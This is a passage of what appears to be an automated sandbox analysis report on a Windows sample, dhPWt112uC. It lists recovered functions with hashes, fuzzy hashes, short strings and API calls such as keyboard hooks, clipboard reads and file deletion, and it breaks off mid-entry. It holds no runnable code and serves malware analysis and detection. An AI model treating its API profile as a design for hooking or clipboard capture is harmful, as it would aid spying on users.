String ID:
API String ID:
Opcode ID: 15cd805c1d6a955229f16b53177cda9d107351a5c2b71a6cf1a99ab1a449e33e
Instruction ID: 6de9ae48ea655db0b549e8d941935df80fea19947073bd257bd04a6963f35913
Opcode Fuzzy Hash: 15cd805c1d6a955229f16b53177cda9d107351a5c2b71a6cf1a99ab1a449e33e
Instruction Fuzzy Hash: 2D225270E101098FFF64CB68E5947AFB7B6EB49310F248926E409DB395CA35DC85CBA1

Function 06F9ADA8 Relevance: 10.4, Strings: 8, Instructions: 393
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 06F9AF57
$^q, xrefs: 06F9AF28
$^q, xrefs: 06F9AEC9
$^q, xrefs: 06F9AF4B
$^q, xrefs: 06F9AF74
$^q, xrefs: 06F9AED5
$^q, xrefs: 06F9AF1C
$^q, xrefs: 06F9AF80

Memory Dump Source

Source File: 00000004.00000002.4183149098.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f90000_dhPWt112uC.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-3823777903
Opcode ID: e48a6daf41d1b1d10879e4291c2e2ad5c40759d6251fa221b8d1602a60d0d4c6
Instruction ID: 9c8cb1870ba4d5604540309a2e1043c05a276bdf49a963ee018dc88434d535ce
Opcode Fuzzy Hash: e48a6daf41d1b1d10879e4291c2e2ad5c40759d6251fa221b8d1602a60d0d4c6
Instruction Fuzzy Hash: 22E15E70E102098FEF69DF69E5806AEB7B2FF89704F108529D409AB354DB35DC46CB91

Function 06F9B728 Relevance: 8.0, Strings: 6, Instructions: 474
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 06F9BCAD
$^q, xrefs: 06F9BCB9
$^q, xrefs: 06F9BCE1
$^q, xrefs: 06F9BC79
$^q, xrefs: 06F9BCED
$^q, xrefs: 06F9BC85

Memory Dump Source

Source File: 00000004.00000002.4183149098.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f90000_dhPWt112uC.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-2392861976
Opcode ID: 26836d5affc9b8c5a02ceae5e90442ce099ac8f36318c0c7ec5278bc060972c4
Instruction ID: 74c01b4bef92a9c680cffe84808196cdf1f812137ee9fe409c95513df17d6aa6
Opcode Fuzzy Hash: 26836d5affc9b8c5a02ceae5e90442ce099ac8f36318c0c7ec5278bc060972c4
Instruction Fuzzy Hash: 14025C30E1020A8FEFA4CF68E4846AEB7B2FB45714F14896AD405DB355DB35DC86CBA1

Function 06F8A247 Relevance: 6.2, APIs: 4, Instructions: 159
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 06F8A306
GetCurrentThread.KERNEL32 ref: 06F8A343
GetCurrentProcess.KERNEL32 ref: 06F8A380
GetCurrentThreadId.KERNEL32 ref: 06F8A3D9

Memory Dump Source

Source File: 00000004.00000002.4183028678.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f80000_dhPWt112uC.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 8c01a8c7b596a2a98573a3c4a9cf0d44886c5fd60b135a80a84df4ac3d9e4271
Instruction ID: 82d62da0065cff2a1e7dbc3a8cc5594855cfc93bf105349fe637cfc9db487bdd
Opcode Fuzzy Hash: 8c01a8c7b596a2a98573a3c4a9cf0d44886c5fd60b135a80a84df4ac3d9e4271
Instruction Fuzzy Hash: 296199B09013498FDB50DFA9D9487DEBFF1EF49304F24809AE049A7260DB745884CB66

Function 06F8A288 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 06F8A306
GetCurrentThread.KERNEL32 ref: 06F8A343
GetCurrentProcess.KERNEL32 ref: 06F8A380
GetCurrentThreadId.KERNEL32 ref: 06F8A3D9

Memory Dump Source

Source File: 00000004.00000002.4183028678.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f80000_dhPWt112uC.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: c42f2047207fb8d428b0b7b0d91cdc82db5a2bf98e0cdb3d0507624265ed6125
Instruction ID: e4164170f5978f11b905e9c1daa792104fb8c6634cd5f9fb741b0fae4c465c35
Opcode Fuzzy Hash: c42f2047207fb8d428b0b7b0d91cdc82db5a2bf98e0cdb3d0507624265ed6125
Instruction Fuzzy Hash: CE5146B0D002098FDB44DFAAD948B9EBBF1EF48304F24805AE059A7360DB759984CF66

Function 06F99230 Relevance: 5.2, Strings: 4, Instructions: 230
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 06F99277
$^q, xrefs: 06F992BE
$^q, xrefs: 06F99283
$^q, xrefs: 06F992B2

Memory Dump Source

Source File: 00000004.00000002.4183149098.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f90000_dhPWt112uC.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q
API String ID: 0-2125118731
Opcode ID: 37958879be97169609bf3257e4a136ecd3c40bc9e3d0be02ca9d5985c0535a1b
Instruction ID: b763adda2e1808887cc32fe33b689cc86e5e1daf0da70beb37d139a7851c682f
Opcode Fuzzy Hash: 37958879be97169609bf3257e4a136ecd3c40bc9e3d0be02ca9d5985c0535a1b
Instruction Fuzzy Hash: 11915B30F0021A9FEF54DF65D8907AEB3F6EF88604F148469D40AEB384EB749D468B91

Function 06F9D030 Relevance: 4.6, Strings: 3, Instructions: 802
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 06F9D427
$^q, xrefs: 06F9D43B
$^q, xrefs: 06F9D42F

Memory Dump Source

Source File: 00000004.00000002.4183149098.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f90000_dhPWt112uC.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q
API String ID: 0-831282457
Opcode ID: 560d2bb50b5b7ec471e17ad9f9dd30c347fe2ad19a5fc80fb7dbdf25a2664cc5
Instruction ID: c25f35a968bfab430b6e1300052cfae21e01572bfd2be353b4415665395176e5
Opcode Fuzzy Hash: 560d2bb50b5b7ec471e17ad9f9dd30c347fe2ad19a5fc80fb7dbdf25a2664cc5
Instruction Fuzzy Hash: FD626130A006068FDF55DF68E580A5EB7B6FF84304F209A69D0099F369DB75EC4ACB91

Function 06F94C70 Relevance: 3.9, Strings: 3, Instructions: 186
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

\Ocq, xrefs: 06F94E4B
fcq, xrefs: 06F94C9B
XPcq, xrefs: 06F94DC1

Memory Dump Source

Source File: 00000004.00000002.4183149098.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f90000_dhPWt112uC.jbxd

Similarity

API ID:
String ID: fcq$XPcq$\Ocq
API String ID: 0-3575482020
Opcode ID: 4f5f15d280ca8ddd0ae4698324072e92c7263b7593a1b8faca6512fa21aa331b
Instruction ID: 2a31490a2775aa9c520570bfe1da0bac3475f4dd382862364a192fb29f5a2766
Opcode Fuzzy Hash: 4f5f15d280ca8ddd0ae4698324072e92c7263b7593a1b8faca6512fa21aa331b
Instruction Fuzzy Hash: F1616E70E002199FEF54DFA5C8547AEBBF6FB98700F20842AD10AAB395DB758C458B91

Function 06F99220 Relevance: 2.7, Strings: 2, Instructions: 163
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 06F99277
$^q, xrefs: 06F992B2

Memory Dump Source

Source File: 00000004.00000002.4183149098.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f90000_dhPWt112uC.jbxd

Similarity

API ID:
String ID: $^q$$^q
API String ID: 0-355816377
Opcode ID: 453bd6ad68ded409d0cf8c81c145183b67523e246db92693aaf26d4f57210a52
Instruction ID: 95eebbe9154a0d2ecd56cae0eb49ff44225b4d47c7450c29ff2811c28ddad009
Opcode Fuzzy Hash: 453bd6ad68ded409d0cf8c81c145183b67523e246db92693aaf26d4f57210a52
Instruction Fuzzy Hash: 20512E31B001059FEF54DB75D990BAEB3F6EB88654F148469D80AEB384EB74DC428BA1

Function 06F94C61 Relevance: 2.6, Strings: 2, Instructions: 143COMMON

Download Yara Rule

Strings

fcq, xrefs: 06F94C9B
XPcq, xrefs: 06F94DC1

Memory Dump Source

Source File: 00000004.00000002.4183149098.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f90000_dhPWt112uC.jbxd

Similarity

API ID:
String ID: fcq$XPcq
API String ID: 0-936005338
Opcode ID: 0cfa0db20d7c2f5e93a17762f98da20e6b4c9c642729ecf2c71e225395ad6ad7
Instruction ID: 717f96d7521ff55d4b2553997191897b611463d8a457e823e5691eb588621a3b
Opcode Fuzzy Hash: 0cfa0db20d7c2f5e93a17762f98da20e6b4c9c642729ecf2c71e225395ad6ad7
Instruction Fuzzy Hash: 4A515170F002199FEB55DFA5C4547AEBBF6FF88700F208529D105AB395DB758C068B91

Function 031AEFB8 Relevance: 1.7, APIs: 1, Instructions: 158COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4166727402.00000000031A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_31a0000_dhPWt112uC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b584ab297202d704a324fab0d562509bc64a04e0e9bea4f2923ee6c11806d15
Instruction ID: 4c5ddaf0da1a581376b3bfffe216d45abe8e9c034495df7156522b87171da7aa
Opcode Fuzzy Hash: 8b584ab297202d704a324fab0d562509bc64a04e0e9bea4f2923ee6c11806d15
Instruction Fuzzy Hash: 0B5100319047988FCB14CBB9D8102AABBF5EF89210F1985ABE445E7291DB349845CBA1

Function 06F8672E Relevance: 1.6, APIs: 1, Instructions: 117COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06F8684A

Memory Dump Source

Source File: 00000004.00000002.4183028678.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f80000_dhPWt112uC.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 9a9f90272e86aa804aa2e5f2a23a6b86f1f28110ad940ac05d8b69d11831eb9b
Instruction ID: f709fcc328e758abb278cc0239b3ea6ca545648a2bf58015b9595bdfee9b9619
Opcode Fuzzy Hash: 9a9f90272e86aa804aa2e5f2a23a6b86f1f28110ad940ac05d8b69d11831eb9b
Instruction Fuzzy Hash: 5151CEB5D00309DFDB14DFA9D984ADEBBB5BF48310F24862AE819AB210D7709985CF91

Function 06F86738 Relevance: 1.6, APIs: 1, Instructions: 113COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06F8684A

Memory Dump Source

Source File: 00000004.00000002.4183028678.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f80000_dhPWt112uC.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: f5f3f17f7470dce91f97c23a332c486bc38fdf69e8efdce22e4b1da1bc695941
Instruction ID: 61f3615873bf7d41cf599a6e01118dcf7bdf37c15b908934c9d5227c2186ab1e
Opcode Fuzzy Hash: f5f3f17f7470dce91f97c23a332c486bc38fdf69e8efdce22e4b1da1bc695941
Instruction Fuzzy Hash: 7F41B1B1D00309DFDB14DF99C884ADEBBB5BF48310F24812AE819AB210D7719885CF91

Function 06F8B0E0 Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 06F8B839

Memory Dump Source

Source File: 00000004.00000002.4183028678.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f80000_dhPWt112uC.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 845f8f9edbf1e87f882d300deecbf7c4b93960248b62a2e931eee99afc73cc4f
Instruction ID: 23b0dcc5f495ce7e7399bda8c8052a32a258f7d3f57d7445941ae5042c9619e1
Opcode Fuzzy Hash: 845f8f9edbf1e87f882d300deecbf7c4b93960248b62a2e931eee99afc73cc4f
Instruction Fuzzy Hash: CD4129B9900305CFDB54DF99C888AAABBF5FF88314F24C499D519AB321D735A841CFA0

Function 06F8C0C7 Relevance: 1.6, APIs: 1, Instructions: 72comclipboardCOMMON

Download Yara Rule

APIs

OleGetClipboard.OLE32(?), ref: 06F8C150

Memory Dump Source

Source File: 00000004.00000002.4183028678.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f80000_dhPWt112uC.jbxd

Similarity

API ID: Clipboard
String ID:
API String ID: 220874293-0
Opcode ID: 4c35a309e5f02ed5c77ba9e3c7addc09de7c471aa0387c71784cc3ba5512b433
Instruction ID: d3a2191f739e8f9038eedc8eff01a3593254782f9a1a1de0cb36ff026bd85486
Opcode Fuzzy Hash: 4c35a309e5f02ed5c77ba9e3c7addc09de7c471aa0387c71784cc3ba5512b433
Instruction Fuzzy Hash: 2E31F1B4D01648DFDB50DFA9C984BCEBBF5AF48304F248059E404BB294DBB4A985CFA5

Function 06F8C0C8 Relevance: 1.6, APIs: 1, Instructions: 71comclipboardCOMMON

Download Yara Rule

APIs

OleGetClipboard.OLE32(?), ref: 06F8C150

Memory Dump Source

Source File: 00000004.00000002.4183028678.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f80000_dhPWt112uC.jbxd

Similarity

API ID: Clipboard
String ID:
API String ID: 220874293-0
Opcode ID: b5a8cec79ec1ee6af1438c24959c54c63072f223690af87d81bb611abdd25376
Instruction ID: f03a9a21b769bdfde0027617dbf8a6c4b5dc16e91cc6d94052bcecce09c76560
Opcode Fuzzy Hash: b5a8cec79ec1ee6af1438c24959c54c63072f223690af87d81bb611abdd25376
Instruction Fuzzy Hash: 3E31F1B4D01648DFDB50DF99C984BCEBBF5AF48304F248059E404BB294DBB4A985CFA5

Function 06F8BF20 Relevance: 1.6, APIs: 1, Instructions: 65comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 06F8BFD5

Memory Dump Source

Source File: 00000004.00000002.4183028678.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f80000_dhPWt112uC.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 33ad99912512790e53c87b91ecb15a850ff6d2bcf0dc2c2fc63130cad94a0431
Instruction ID: f0c64d647675ea6dd5fb47fb9c4efc65d028ca3930369a1ba67214f2fd0f60b2
Opcode Fuzzy Hash: 33ad99912512790e53c87b91ecb15a850ff6d2bcf0dc2c2fc63130cad94a0431
Instruction Fuzzy Hash: F4216D75D047848FCB60DFA9C64579ABFF0EF48314F18489AE489A7661C378A584CF91

Function 06F8A4D0 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06F8A557

Memory Dump Source

Source File: 00000004.00000002.4183028678.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f80000_dhPWt112uC.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 3f628de616c75ae954e963371a4943e392e1518bb3b86cd62c21111210a67030
Instruction ID: 6675b28a2496a295405e732f0720057e27c37091946aaeae3ec14bf0a5b3046c
Opcode Fuzzy Hash: 3f628de616c75ae954e963371a4943e392e1518bb3b86cd62c21111210a67030
Instruction Fuzzy Hash: 6321C4B5D00258DFDB10CF9AD984ADEBBF4EB48310F14845AE958A7350D374A944CFA5

Function 06F8DE88 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

SetWindowsHookExA.USER32(?,00000000,?,?), ref: 06F8DF0B

Memory Dump Source

Source File: 00000004.00000002.4183028678.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f80000_dhPWt112uC.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: 9d64da813ba91bb29f47761f12f4c74c05b7800d192b93d371a9fbb44baa05fa
Instruction ID: d2ff7204af1637f0cfd4cf8c284858f229688a874b6d184af31b0218f7c6743b
Opcode Fuzzy Hash: 9d64da813ba91bb29f47761f12f4c74c05b7800d192b93d371a9fbb44baa05fa
Instruction Fuzzy Hash: 342134B5D042099FCB14DF99D844BEEFBF4EF88320F10842AE458A7250C774A940CFA5

Function 06F8A4C8 Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06F8A557

Memory Dump Source

Source File: 00000004.00000002.4183028678.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f80000_dhPWt112uC.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 3cf9b4827da923ba40f4c74def5de4dba7c3ec2fbdd089dab4e3a4ea49277b6b
Instruction ID: a492059bf9adec45ce985d66553dd08bd49f5346f54a8e921cfaa2c15aca5fbd
Opcode Fuzzy Hash: 3cf9b4827da923ba40f4c74def5de4dba7c3ec2fbdd089dab4e3a4ea49277b6b
Instruction Fuzzy Hash: DE21E3B5D00248DFDB10CFA9D984ADEBBF4FB48310F14845AE958B7210C374A984CF64

Function 06F8B10D Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,06F8BA8D), ref: 06F8BB17

Memory Dump Source

Source File: 00000004.00000002.4183028678.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f80000_dhPWt112uC.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: c4fddf8c8804771897a156feac5dd533e24db667eb8ce071d9b1a3ccf17a8668
Instruction ID: d890e623bfd3d5c20bcf8bbcddf054edfa090d705a7b8a8f6c9152f007bf48c4
Opcode Fuzzy Hash: c4fddf8c8804771897a156feac5dd533e24db667eb8ce071d9b1a3ccf17a8668
Instruction Fuzzy Hash: 512147B58043998FCB10EF99D4447DABBF4EF49314F10845AD998A7251C374A584CBA5

Function 031A8038 Relevance: 1.6, APIs: 1, Instructions: 59fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(00000000), ref: 031A80B0

Memory Dump Source

Source File: 00000004.00000002.4166727402.00000000031A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_31a0000_dhPWt112uC.jbxd

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 96cd82a7bedf9071850df8595f24331941419c93e55ed6ecdca987a78c552735
Instruction ID: 113def4b6b1fbd05d226bef838337e015ebe055fcd5e2b85aa94410fe3cd3f88
Opcode Fuzzy Hash: 96cd82a7bedf9071850df8595f24331941419c93e55ed6ecdca987a78c552735
Instruction Fuzzy Hash: 062115B5C006599FCB20CF9AC545A9EFBB4AB48320F15852AD858A7250D778A940CFA5

Function 06F8DE90 Relevance: 1.6, APIs: 1, Instructions: 57COMMON

Download Yara Rule

APIs

SetWindowsHookExA.USER32(?,00000000,?,?), ref: 06F8DF0B

Memory Dump Source

Source File: 00000004.00000002.4183028678.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f80000_dhPWt112uC.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: 5408d0cc4748fb0b81039330fc298c6fa3c30b18a0fc6de6f35516844613f876
Instruction ID: 4bee4c151f7fc0c31c17661f8d74a878bcbde67ceb651ac3b3073accc7c77d23
Opcode Fuzzy Hash: 5408d0cc4748fb0b81039330fc298c6fa3c30b18a0fc6de6f35516844613f876
Instruction Fuzzy Hash: 1C21E0B1D04209DFCB54DF9AC844BEEFBF5AF88320F14842AE459A7290C775A944CFA5

Function 031A8040 Relevance: 1.6, APIs: 1, Instructions: 56fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(00000000), ref: 031A80B0

Memory Dump Source

Source File: 00000004.00000002.4166727402.00000000031A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_31a0000_dhPWt112uC.jbxd

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 25c86861ad5c360e4bcec72cd3fe42eb7ac48337771dfc2e6ca413e14d555ceb
Instruction ID: 9b1393dd2c7ea2d8cf94368ccbd527d560f675aa53862b063161f2063a6e4537
Opcode Fuzzy Hash: 25c86861ad5c360e4bcec72cd3fe42eb7ac48337771dfc2e6ca413e14d555ceb
Instruction Fuzzy Hash: 2E1103B5C0065A9FCB24CF9AC544BAEFBB4BB48320F15812AD858B7250D778A944CFA5

Function 031AF0A0 Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(?), ref: 031AF107

Memory Dump Source

Source File: 00000004.00000002.4166727402.00000000031A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_31a0000_dhPWt112uC.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: e8803b840f3100a98e0fc395c9934b54c86c7aad0733bf46fecfb67beed85447
Instruction ID: fa5d641a8f8426a64c5150e62c16420b4233308a218b9a3b3721288dbf8922cd
Opcode Fuzzy Hash: e8803b840f3100a98e0fc395c9934b54c86c7aad0733bf46fecfb67beed85447
Instruction Fuzzy Hash: DA1112B1C00669DFCB10CF9AC944BDEFBF4AB48320F14812AD818B7250D378A940CFA5

Function 06F85688 Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 06F856F6

Memory Dump Source

Source File: 00000004.00000002.4183028678.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f80000_dhPWt112uC.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 20c3d9fc61d0df522d412c7822283532cdcd4eb98f35b0712a7ff1a24d1eb7e2
Instruction ID: 2a15bdfd56c318f5535ec6da9da6e10e2ebd5a091c9967d2b350da188a057930
Opcode Fuzzy Hash: 20c3d9fc61d0df522d412c7822283532cdcd4eb98f35b0712a7ff1a24d1eb7e2
Instruction Fuzzy Hash: 05110FB6D00249CFCB20DF9AD844ADEFBF4AF89320F10846AD429B7610C375A585CFA5

Function 06F83FB4 Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 06F856F6

Memory Dump Source

Source File: 00000004.00000002.4183028678.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f80000_dhPWt112uC.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 9335118fe8c2557f23f9bc0ea294f03a655333fb79c849d2278b9eb651cc513d
Instruction ID: 5c0cff06051d9f901ff8ec4355730f362947870b503517aed98a7cd1780ea901
Opcode Fuzzy Hash: 9335118fe8c2557f23f9bc0ea294f03a655333fb79c849d2278b9eb651cc513d
Instruction Fuzzy Hash: 9B11FDB6C00349CFDB50DF9AC848A9EFBF4EB89220F10846AD829B7210D375A545CFA5

Function 06F8B36C Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 06F8BFD5

Memory Dump Source

Source File: 00000004.00000002.4183028678.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f80000_dhPWt112uC.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 48632a810790c0223c8cbdead1083864b294f5dbc06d149ce1fe8d17536c24d6
Instruction ID: 357ba8e79b8883309443fc024e5da789f0cc4a7e2b790be1d405338d0513f73c
Opcode Fuzzy Hash: 48632a810790c0223c8cbdead1083864b294f5dbc06d149ce1fe8d17536c24d6
Instruction Fuzzy Hash: E51112B5904348CFCB20DF9AC888BDEBBF4EB48324F24845AE558B7210C374A944CFA5

Function 06F8B134 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,06F8BA8D), ref: 06F8BB17

Memory Dump Source

Source File: 00000004.00000002.4183028678.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f80000_dhPWt112uC.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 9a615afd75fbf74e53705909f05fd6a0af6489d9d08084a4cc4d26cd9d6ec3dd
Instruction ID: 95f6e4149dedc55e983c88dbeaf9d14984cb87d8ed585724b55372ccba1edb67
Opcode Fuzzy Hash: 9a615afd75fbf74e53705909f05fd6a0af6489d9d08084a4cc4d26cd9d6ec3dd
Instruction Fuzzy Hash: 1E1106B1900248CFCB50DF9AD444BDEBBF4EB48324F20845AE559A7250C774A944CFA5

Function 06F8BF79 Relevance: 1.5, APIs: 1, Instructions: 43comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 06F8BFD5

Memory Dump Source

Source File: 00000004.00000002.4183028678.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f80000_dhPWt112uC.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: c1db743c4a9ad7e6c08610a4670c3bdfef2366b3e0a10bf8de2a8340bb041306
Instruction ID: 3d5372a4ba980c3fb7531211c83113dbbdc59a9c1c3c1eb3a1f9fcc832e01a49
Opcode Fuzzy Hash: c1db743c4a9ad7e6c08610a4670c3bdfef2366b3e0a10bf8de2a8340bb041306
Instruction Fuzzy Hash: 6F1100B5800348CFCB20DF99C588BDEBBF4EF48324F24885AD558A7211C334A585CFA5

Function 06F8BAB0 Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,06F8BA8D), ref: 06F8BB17

Memory Dump Source

Source File: 00000004.00000002.4183028678.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f80000_dhPWt112uC.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 41ed145c6f06cb5b1367ffae31e4af08feb48474b68eda77f13bc703a748a969
Instruction ID: 0c178edd6efeabd7fc29192a0ddb74210a3e7dc16898f0e2bec05a209e03fc2f
Opcode Fuzzy Hash: 41ed145c6f06cb5b1367ffae31e4af08feb48474b68eda77f13bc703a748a969
Instruction Fuzzy Hash: 661100B5C00249CFCB20DF99D984BDEBBF4AB48324F20845AD558B7250C374A584CFA5

Function 06F9DBA5 Relevance: 1.4, Strings: 1, Instructions: 126COMMON

Download Yara Rule

Strings

PH^q, xrefs: 06F9DD01

Memory Dump Source

